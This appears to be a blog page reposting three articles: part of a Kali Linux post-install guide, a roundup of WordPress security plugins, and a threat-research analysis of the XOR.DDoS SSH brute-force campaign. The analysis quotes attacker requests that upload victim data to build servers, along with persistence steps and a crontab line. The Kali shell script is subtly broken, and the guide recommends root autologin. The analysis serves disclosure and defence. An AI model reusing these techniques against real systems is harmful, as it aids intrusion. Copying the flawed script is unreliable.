The default add-apt-repository application located in (/usr/bin/add-apt-repository) works for Debian. So if you’re using Kali, chances are it won’t work. There’s a nice fix for that which I will add at the bottom of this post, (try them on VirtualBox if you feel like). But I found we can just mimic Ubuntu Oneiric to make add-apt-repository work.
cd /usr/sbin
vi add-apt-repository
Add the following code and save the file.
#!/bin/bash
if [ $# -eq 1 ]
NM=`uname -a && date`
NAME=`echo $NM | md5sum | cut -f1 -d" "`
then
  ppa_name=`echo "$1" | cut -d":" -f2 -s`
  if [ -z "$ppa_name" ]
  then
    echo "PPA name not found"
    echo "Utility to add PPA repositories in your debian machine"
    echo "$0 ppa:user/ppa-name"
  else
    echo "$ppa_name"
    echo "deb http://ppa.launchpad.net/$ppa_name/ubuntu oneiric main " >> /etc/apt/sources.list
    apt-get update >> /dev/null 2> /tmp/${NAME}_apt_add_key.txt
    key=`cat /tmp/${NAME}_apt_add_key.txt | cut -d":" -f6 | cut -d" " -f3`
    apt-key adv --keyserver keyserver.ubuntu.com --recv-keys $key
    rm -rf /tmp/${NAME}_apt_add_key.txt
  fi
else
  echo "Utility to add PPA repositories in your debian machine"
  echo "$0 ppa:user/ppa-name"
fi
Note: In this line echo "deb http://ppa.launchpad.net/$ppa_name/ubuntu oneiric main" >> /etc/apt/sources.list I’ve used Oneiric. You can try to use LucidRaring or Saucy as per your choice. Now chmod and chown the file.
chmod o+x /usr/sbin/add-apt-repository 
chown root:root /usr/sbin/add-apt-repository
Now that we added the correct code, we can use add-apt-repository to add a PPA repository. I tried the following to add themes and custom icons in Kali Linux.
/usr/sbin/add-apt-repository ppa:noobslab/themes
/usr/sbin/add-apt-repository ppa:alecive/antigone
Kali Linux add PPA repository add-apt-repository - adding PPA Repository using add-apt-repository - 7 - blackMORE Ops
I’ve removed all screenshots from this post, but if you want see read and understand how it all works, I suggest reading the details post on  adding PPA repository add-apt-repository in Kali Linux.

11. Install Tor

Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security. This guide guides your through installing tor in Kali Linux. Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location.
How to install Tor - logo - blackMORE Ops
Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this:
apt-get install tor
Enable tor service from command line:
service tor start
Browse with confident by using proxychains and tor
proxychains iceweasel
To keep things simple in this post, I’ve only shows one part of using Tor. You might want to read the full details in Installing Tor In Kali Linux post.
12. Install Filezilla FTP Client
No Linux installation is complete with a proper fully fledged FTP Client. Filezilla is the best out there, so install Filezilla using the following command:
apt-get install filezilla filezilla-common -y

13. Install HTOP And NetHogs

This is a special one, HTOP shows running process and memory used including many more details. (you could use top command, but HTOP is just more useful). NetHogs is useful and it shows traffic used by applications per interface. Install them using the following command:
apt-get install htop nethogs -y
You can now run then using the following commands:
htop
nethogs eth0
nethogs wlan0
I’m almost certain, you’ll enjoy using these tiny tools.

14. Install Proprietary Drivers For Your Graphics Card

Depending on which graphics card you’re using, (AMD or NVIDIA), you might want to install proprietary drivers to unlock more features. There’s some excellent post I’ve made on Install AMD ATI proprietary driver (fglrx) in Kali Linux.
Install AMD ATI Driver (fglrx) in Kali Linux 1.x - blackMORE Ops
NVIDIA users can just stick to the official documentation for installing NVIDIA Drivers. In case, official documentation is not working or you’ve hit rock bottom, you can try following this other post I’ve written to install NVIDIA binary drivers manually.
How to Install Nvidia Kernel Module Cuda and Pyrit in Kali Linux - blackMORE Ops

15. Install Recordmydesktop And Reminna Remote Desktop Client

Recordmydesktop gives you the ability to record and make a video of your activities in Kali Linux. Remmina is simialar to Windows Remote Desktop Client. Both very useful. Install them using the following command:
apt-get install gtk-recordmydesktop recordmydesktop remmina -y

16. Install GDebi Package Manager

dpkg is a powerful tool, but it doesn’t install dependencies automatically. What we need is some package installer that can go out and fetch all required dependencies while installing a .deb package. The best one out there is gdebi. Install it using the following command:
apt-get install gdebi -y
10 - Install Skype in Kali Linux - apt-get install gdebi - blackMORE Ops

Enhancements And Accessibility

17. Install A Theme

Installing theme and revving up your desktop is a great idea. Kali default desktop is dull and boring. There’s two different ways you can change theme.
  1. Manually install theme
  2. Install theme via PPA repository
Read details here to and find out how to change or install GTK3 themes in Kali Linux.
10 - Enable MAC OSX Theme and ICONS - Change Install Theme in Kali Linux - GTK 3 themes - blackMORE Ops

18. Install A New Desktop Environment (I Prefer XFCE).

I prefer XFCE Desktop, but you can try to install/remove different Desktop Environments or Window Manager in Kali Linux Depending on which one you need choose links below:
  1. How to install/remove XFCE Desktop Environment in Kali Linux
  2. How to install/remove different KDE Desktop Environments in Kali Linux
  3. How to install/remove LXDE Desktop Environment in Kali Linux
  4. How to install/remove GNOME Desktop Environment on Kali Linux
  5. How to install/remove Cinnamon Desktop Environment in Kali Linux
  6. How to install/remove MATE Desktop Environment in Kali Linux
Finally, follow follow these instructions to permanently switch Desktop Environments.(i.e. boot into XFCE instead of GNOME).
How to install remove GNOME Desktop Environment on Kali Linux - blackMORE Ops

19. Enable Autologin User

It’s a simple change. Just open and edit the file called /etc/gdm3/daemon.conf, assuming you’re using GNOME Display Manager(gmd3) a your main Display Manager. You might want to try out other desktops as well. Here’s a link to Add/Remove different desktop Managers in Kali Linux.
root@kali:~# leafpad /etc/gdm3/daemon.conf
In the daemon section un-comment the 2 lines for automatic login. It should finally look like this
[daemon]
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = root
That’s it. Too easy. In case you’re wondering how to use a different user than root, here’s how
[daemon]
# Enabling automatic login
  AutomaticLoginEnable = true
  AutomaticLogin = myanotheruser
Auto login root user at system start in Kali Linux - GNOME and KDE - blackMORE Ops
Last but not the least, reboot to check if it worked. (which it will, cause it’s Linux and Kali is awesome)
reboot
You might want to follow up on this one or if you’re KDE user, then here’s the instructions to Auto login root user at system start in Kali Linux – GNOME and KDE. This article also shows how to auto-login a different non-root user… quite handy.

More Advanced Stuffs:

This part explains how to get more out of your system, specially Graphics card.

20. Unlock GPU Processing

Last but not the least, GPU processing is a lot faster when you’re trying to break a password. Depending on your Graphics card,  you choose options as outlined below:
a. AMD
Then follow rest of the guides here
b. NVIDIA
I found that official documentation for installing NVIDIA Drivers doesn’t work for Kali Linux due to a UVM error. Following two posts will take you through installing NVIDIA official driver and CUDA+Pyrit (updated 26/08/2014)

What Can I Do With Kali Linux?

You can do a lot.
Reference: http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/
Original Post: http://www.thepirateboat.org/2015/02/things-to-do-after-installing-kali-linux.html

7 Best WordPress Security Plugins

WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server.

In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin. So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure.

In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are WordPress user, you can use this tool to find vulnerabilities in your website and patch.

In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress.

1. WordFence

WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. If scans all the files of your WordPress core, theme and plugins. If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses Falcom caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it.

This plugin blocks bruteforce attack and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnet and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get email notification.

It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website.

Download WordFence

2. BulletProof Security

BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with four-click setup interface. Just activate this plugin and then relax. It will take care of your website.

It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies admin. It also optimizes the performance of your website by adding caching. It comes with built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many other. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating it according to new exploits and vulnerabilities.

It also has a pro version which offers some advanced features to improve the security of your website. But the free version is popular enough to make your website secure.

Download BulletProof Security

3. Sucuri Security

Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email.

It protects your website from DOS attack, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps log of all activities and keep these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri’s security operations center.

If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice.

Download Sucuri Security

4. iThemes Security (formerly Better WP Security)

iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. it also fixes various common security holes in your website.

It tracks registered users’ activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things.

It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and ban IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for admin area in server support. Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website.

Download iThemes security

5. Acunetix WP SecurityScan

Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing WP generator tag from source, and database security.

It removes various information from the source code of the page which can be used in the information gathering process before attack. This includes theme update information, plugin update information, really simple discover meta tag, WordPress version, Windows live write meta tag, error information from login page, versions from scripts, versions from stylesheets, database and php error reporting.

It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify known web application vulnerabilities.

Download Acunetix WP SecurityScan

6. All In One WP Security & Firewall

All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices.

It protect against bruteforce login attack and lockdown if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. It also monitors the account activity of all users and keeps track of username, IP and login date time.

It also allows you to schedule automatic backup and receive email notification. It also protects PHP code by disabling admin area editing. It adds a web application firewall in your website and enables 5G Blacklist to prevent various attacks. It denies bad query strings, prevent XSS, CSRF, SQL injection, malicious bots and other security threats.

It also has a security scanner which keeps track of files and notifies you about each changes in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem.

Download All In One WP Security & Firewall

7. 6Scan Security

6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date.

It has a security scanner which scans and protect your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file including, DOS attack and other OWASP top ten security vulnerabilities.

A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website.

Download 6 Scan Security

Additional security measures

Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog.

  • Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. Most of the times, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress.
  • Always keep plugins and themes added in your blog updates to latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website.
  • Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why to take risk. Avoid any unknown source for download plugins and themes.
  • Avoid using the administrator username ‘admin’, because this is default and common. By using this username in your blog, you are making the attacker’s work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore.
  • Always use strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess.

Conclusion

These are few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detail reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website.

Original Post: http://resources.infosecinstitute.com/7-best-wordpress-security-plugins/

Anatomy of a Brute Force Campaign: The Story of Hee Thai Limited

Summary

This is the tale of an ongoing SSH brute forcing campaign, targeting servers and network devices, that distributes a new family of Linux rootkit malware named “XOR.DDoS.” While typical DDoS bots are straightforward in operation and often programmed in a high-level script such as PHP or Perl, the XOR.DDoS family is programming in C/C++ and incorporates multiple persistence mechanisms including a rare Linux rootkit.

The campaign also utilizes complex attack scripts to serve the malware through a sophisticated distribution scheme that allows the attackers to compile and deliver tailored rootkits on-demand to infect x86 and ARM systems alike.

In this post, we will follow the campaign from first sighting to the present day. We reveal the infection strategy, describe the build systems and share indicators of compromise.

Brute Force Campaign

Our story begins on Nov. 15, 2014. Late that evening, FireEye’s global threat research network was suddenly flooded by SSH brute-force detections coming from various IP addresses belonging to 103.41.124.0/24, an address block that was registered to “Hee Thai Limited” only a few weeks prior. Normally, a brute force attack would not be notable. What caught our eye about this attack was the sheer scale of the operation.

Within 24 hours of first sighting, we had observed well over 20,000 SSH login attempts, per server. No server was spared: each was attacked within hours of first sighting. By the end of November, just two weeks later, FireEye’s research systems had each logged about 150,000 login attempts from nearly every IP in Hee Thai Limited’s bucket of 255 addresses. By the end of January, each server had seen nearly 1 million login attempts. During this time period, traffic from 103.41.124.0/24 accounted for 63% of all observed port 22 traffic. Someone with a lot of bandwidth and resources really wanted to get into our servers.

We continued to observe the Hee Thai campaign over the next three months. The brute forcing campaign had three distinct phases. The initial phase began late in the evening of Nov. 15 and lasted less than 36 hours. During this phase, each targeted server was attacked by a single Hee Thai address at a time, in series. Each IP address would attempt more than 20,000 passwords before moving on.

After roughly a day without contact, the second phase of the campaign began on Saturday, Nov. 19 and would last until Sunday, Nov. 30. During this phase, the targeted servers were still attacked by Hee Thai IP’s in series, but each IP would only attempt a few thousand passwords before cycling to the next. Repeat attacks also began to occur. Another characteristic of the second phase was the use of a single password dictionary, a modified version of the RockYou password list, by all attacking IPs.

No activity was observed from the Hee Thai subnet between Monday, Dec. 1 and Sunday, Dec. 7th, which marked the beginning of the third phase and continues to the present day. This new stage of the Hee Thai campaign is more chaotic than the previous two. The attacks now occur en masse and at random, frequently with multiple IPs simultaneously targeting the same server.

The password dictionaries in use have also drastically changed. Now the servers use different dictionaries, varying wildly in size, and the contents of the dictionaries have become increasingly exotic. One particular IP was observed trying several thousand non-sequential and seemingly random numbers. Passwords representing “keyboard walks,” where the password is the result of a keyboard pattern created by drawing lines across a keyboard, were also frequently observed.

Infection Strategy

The Hee Thai SSH brute force campaign always attempts to gain access to the root account. If a login attempt is successful, the brute forcing machine immediately logs out and stops its attack. Within 24 hours a different machine from an IP address outside of Hee Thai’s 103.41.124.0/24 address block will log in and out again. The SSH brute force attacks will still continue and this process may repeat several times, but the events following a successful login attempt are always the same.

On the surface, this appears to be the extent of interactions. Linux servers running the standard OpenSSH server will only see a successful login in their logs, followed by an immediate logout and no further activity.

Figure 1: SSH remote commands not seen in logs

In reality, the second machine that logs in after root’s password is found will run a SSH remote command. This commonly used feature of OpenSSH, interestingly enough, evades standard Linux logging facilities. The OpenSSH server does not log remote commands, even when logging is configured to the most verbose setting. Since a remote command doesn’t create a terminal session, TTY logging systems also do not capture these events. Both the last and lastlog commands, which display listings of recent logins, are also blind.

The Hee Thai campaign has used several different remote commands, depending on when the compromise occurred, as the campaign is constantly evolving. SSH remote commands can consist of multiple shell commands, separated by semi-colons. Hee Thai takes advantage of this to run large, complicated scripts in a single command.

On-demand Malware Build System

Using a sophisticated set of build systems, the malware harvests kernel headers and version strings from victims to deliver customized malware that may be compiled on-demand. A second set of fallback servers exist to deliver a pre-compiled version of the malware without the rootkit component.

This strategy makes hash signature-based detection systems ineffective for detecting XOR.DDoS.

The on-demand compilation mechanism is operated by the remote SSH command seen in the initial stage of a compromise. The most commonly used and most feature-full command/script seen during the Hee Thai campaign is over 6000 characters in length and very sophisticated. Smaller versions of this script have also been seen, particularly a version that exclusively targets 64-bit machines. Additional variations will break up the script into multiple smaller parts, served separately in different files, which fetch each other via wget in series. Ultimately, the scripts all do the same thing, operate the on-demand build system and deliver XOR.DDoS to the target machine.

Figure 2: Hee Thai Campaign Attack Cycle

The script starts by setting up an environment PATH and decoding a series of hard-coded values (including the IP addresses used later), which have been encoded with a simple shift cipher. It also removes the immutable bit and gives execute permissions to the system’s wget and cut binaries, in case an admin locked them down.

The script extracts the system’s kernel vermagic string, which indicates the version number of the kernel. Rootkits on Linux are difficult to distribute because loadable kernel modules (LKM) must be compiled for the kernel they want to run on. Unlike Windows, which has a stable kernel API allowing for the creation of code that is portable between kernel versions, the Linux kernel lacks such an API. Since the kernel’s internals change from version to version, a LKM must be binary compatible with the kernel. A safety mechanism in the form of a kernel version ID string, called the vermagic string, helps to prevent an incompatible LKM from loading.

There is no standard shell command to display the running kernel’s vermagic string. The script cleverly extracts a listing of all active LKMs on the system with lsmod and then uses modinfo on a module to extract the LKM’s vermagic string, which is guaranteed to match the string of the kernel. Then, the extracted vermagic string is hashed with MD5.

Next, the script selects a build server with the same architecture as the targeted host from a hardcoded list, then sends the hashed vermagic string to the server. This is accomplished with wget by sending the hashed vermagic string as a GET parameter to a server-side function on the selected build server. The server will check whether it has seen the hash before and reply appropriately.

GET /check.action?iid=8C204556960B73B25667CA80F33A72F9&kernel=3.14

If the hash is known to the server, the build system uses server-side copies of the necessary kernel headers to compile and deliver the malware in the form of an ELF binary.

If the hash is unknown to the server, meaning it has never seen this kernel before, it will attempt to harvest the target’s kernel headers, if they are installed. If kernel headers are installed, which aren’t necessarily on all systems, it gathers the header files and compresses them into a tgz file. The script downloads a small ELF binary tool with wget, called ‘mini,’ and uses it to upload the compressed kernel headers with a POST request to the build server.

POST /submit.action

username%3Dadmin%26password%3Dadmin%26ip%3D103.25.0.0%3A8003%7C103.240.0.0%3A8003%7C66.102.0.0%3A8003%26ver%3D3.14-2-amd64%5C%5C+SMP%5C%5C+mod_unload%5C%5C+modversions%5C%5C%26kernel%3D3.14%26file%3D%40%2Ftmp%2Fdev.tgz

If the kernel headers aren’t installed on the target, the harvesting is skipped. Instead, the build system attempts to compile a suitable rootkit using the kernel version strings. This is accomplished with a GET request to yet another server-side function.

GET /compiler.action?iid=8C204556960B73B25667CA80F33A72F9&username=admin&password=admin&ip=103.25.0.0%7C103.240.0.0%7C66.102.0.0&ver=3.14-2-amd64%5C%5C+SMP%5C%5C+mod_unload%5C%5C+modversions%5C%5C&kernel=3.14

If the kernel headers aren’t available and the build system can’t get by with just the kernel version strings, or if the build servers are unreachable, the script downloads a precompiled version of the malware without the rootkit component from a backup server.

Finally, the malware is executed. XOR.DDoS extracts itself, sets up its numerous persistence mechanisms and randomly generates a 32-character long string of lowercase letters. This string is sent back to the attacker and is used as a unique identifier for the compromised system.

XOR.DDoS: Modern Linux DDoS Bot with a Rootkit Twist

The ultimate goal of the Hee Thai SSH brute forcing campaign is to infect systems with the XOR.DDoS malware. The non-profit research group “Malware Must Die!” first spotted this new family of Linux malware and they briefly outlined its characteristics in a blog post in September 2014.

XOR.DDoS is ostensibly a DDoS bot. However, unlike typical straightforward DDoS bots, XOR.DDoS is one of the more sophisticated malware families to target the Linux OS. It’s also multi-platform, with C/C++ source code that can be compiled to target x86, ARM and other platforms. XOR.DDoS gets its name from frequent use of XOR encryption within the code and in its network communications.

Two distinct variants of the XOR.DDoS family have been observed in the wild. Most variants are available in many different binaries, which are identical in primary function but differ subtly perhaps containing different DNS server lookups or using different ports for communication. Each variant is also available in versions targeting different platforms (i.e., x86, AMD64, ARM).

To date, the Hee Thai campaign has delivered 41 unique re-compiled binaries from four distribution domains that were observed in the wild. The build system is capable of producing infinitely more versions of the malware on demand.

Variant 1 Persistence Mechanisms

  • 32 randomly generated lower-case characters stored in /var/run/mount.pid
  • Copies itself to /lib/libgcc.so
  • Copies itself to /usr/bin/ with a filename of 10 random lowercase characters
  • Creates symlink to /usr/bin/ copy and placed in /etc/init.d/
  • Creates symlinks to /usr/bin/ in /etc/rc[1-5].d/S90[Session ID]
  • Creates symlinks to /usr/bin/ in /etc/rc.d/rc[1-5].d/S90[Session ID]
  • Cron script to turn on network interfaces, copy /lib/libgcc.so to /lib/libgcc.so.bak, execute /lib/libgcc.so.bak
  • Uses XOR key: BB2FA36AAA9541F0

Variant 2 Persistence Mechanisms

  • First seen Dec. 22, 2014
  • 32 randomly generated lowercase characters stored in /var/run/udev.pid
  • Copies itself to /lib/libgcc4.so
  • Copies itself to /usr/bin/ with a filename identical to the session ID, then appends a timestamp to the binary
  • Creates symlink to /usr/bin/ copy and placed in /etc/init.d/
  • Creates symlinks to /usr/bin/ in /etc/rc[1-5].d/S90[Session ID]
  • Creates symlinks to /usr/bin/ in /etc/rc.d/rc[1-5].d/S90[Session ID]
  • Cron script to copy /lib/libgcc4.so to /lib/libgcc4.4.so, execute /lib/libgcc4.4.so
  • Uses two XOR keys: BB2FA36AAA9541F0 and ECB6D3479AC3823F

Variant 2 is the newest version. All in-the-wild, pre-compiled copies of Variant 2 were replaced on Jan. 20, 2015, with a new set of binaries. It is functionally the same as the original version, but some of the domains used during C&C have changed. Variant 1 distribution servers remain active, but may have fallen out of favor.

When executed, XOR.DDoS attempts to make contact with its C&C servers. Once contact is established, it fetches a small XOR encoded file containing lists of process names, file hashes, file names and IP addresses. It then searches the system for these identifiers and kills/removes them. Processes found to have active network connections with the IPs from the file are also killed. Judging from the contents of the files, XOR.DDoS appears to be killing other malware, ensuring there is no competition for the machine’s resources.

The server may then send a list of targets at any time and the bot will start DoS attacks against them using a variety of methods (SYN, DNS, UDP, TCP).

The rootkit used by XOR.DDoS loads itself as a LKM. Its primary purpose is to hide indicators of compromise at the kernel level. It has functions for hiding processes, files, ports, and controlling netfilter (Linux kernel firewall).

All variants of XOR.DDoS have the ability to download and execute arbitrary binaries as well as a self-update feature, giving the malware the ability to replace itself with newer versions.

Detection and Prevention

Network devices and embedded systems are the most vulnerable to SSH brute force attacks. It may not be straightforward or possible for an end-user to protect these systems against these types of attacks.

If possible, configure your SSH server to use encryption keys instead of passwords. We also recommend you disable remote logins for the root account. The XOR.DDoS malware requires root permissions, and the Hee Thai campaign has only been observed attacking root accounts.

Install a network-based brute force detection system available in some security appliances, including FireEye’s NX product family. These products will defend your network from the initial attack vector, detecting the breach before it can do damage.

Home and small business users can install the open source fail2ban utility, which works with iptables to detect and block brute force attacks.

OpenSSH servers will place the text of an SSH remote command into a $SSH_ORIGINAL_COMMAND environment variable. This can be logged with the ForceCommand feature in the server configuration file, allowing you to detect the compromise, but only after it has occurred.

A compromised system should be isolated from the network, to the extent possible, and cleaned of all IoC’s (see appendix). If a version of XOR.DDoS containing a rootkit has compromised the system, removal may not be feasible.

Conclusion

Brute force attacks are one of the oldest types of attacks. Due to its ubiquity, there are numerous solutions available for defending against them. However a great many systems are vulnerable. Even in enterprise settings, network devices and servers in forgotten branch offices could be exposed to this threat.

Brute forcing credentials remains one of the top 10 most common ways an organization is first breached. The Hee Thai Limited SSH brute force campaign takes advantage of this to find insufficiently defended systems to incorporate into the XOR.DDoS botnet.

Appendix: Indicators of Compromise

Since there are multiple XOR.DDoS variants, each with differing persistence mechanisms, only a sub-set of indicators will be seen in the same infection.

Strings:

  • BB2FA36AAA9541F0
  • ECB6D3479AC3823F

Files:

  • /usr/bin/[10 random characters a-z]
  • /etc/init.d/[10 random characters a-z]
  • /usr/bin/[Session ID]
  • /etc/init.d/[Session ID]
  • /etc/rc1.d/S90[Session ID]
  • /etc/rc2.d/S90[Session ID]
  • /etc/rc3.d/S90[Session ID]
  • /etc/rc4.d/S90[Session ID]
  • /etc/rc5.d/S90[Session ID]
  • /etc/rc.d/rc1.d/S90[Session ID]
  • /etc/rc.d/rc2.d/S90[Session ID]
  • /etc/rc.d/rc3.d/S90[Session ID]
  • /etc/rc.d/rc4.d/S90[Session ID]
  • /etc/rc.d/rc5.d/S90[Session ID]
  • /var/run/sftp.pid
  • /var/run/udev.pid
  • /var/run/mount.pid
  • /etc/cron.hourly/cron.sh
  • /etc/cron.hourly/udev.sh
  • /etc/crontab
      • */3 * * * * root etc/cron.hourly/udev.sh
  • /lib/libgcc.so
  • /lib/libgcc.so.bak
  • /lib/libgcc4.so
  • /lib/libgcc4.4.so
  • /lib/udev/udev
  • /lib/udev/debug

Domains

  • heethai.com
  • buhenge.com
  • rxxiaoao.com
  • hcxiaoao.com
  • info.3000uc.com
  • wangzongfacai.com
  • navert0p.com
  • dsaj2a.com
  • dsaj2a.org
  • dsaj2a1.org

IP addresses (hard-coded into binary)

  • 103.25.9.228
  • 103.25.9.229

Malware Binary MD5 Hashes

  • 0b7630ead879da12b74b2ed7566da2fe (variant 1)
  • 85ecdf50a92e76cdb3f5e98d54d014d4 (variant 2)

IOC content is posted at: https://github.com/fireeye/iocs/tree/master/BlogPosts

Original  post: https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html

Up ↑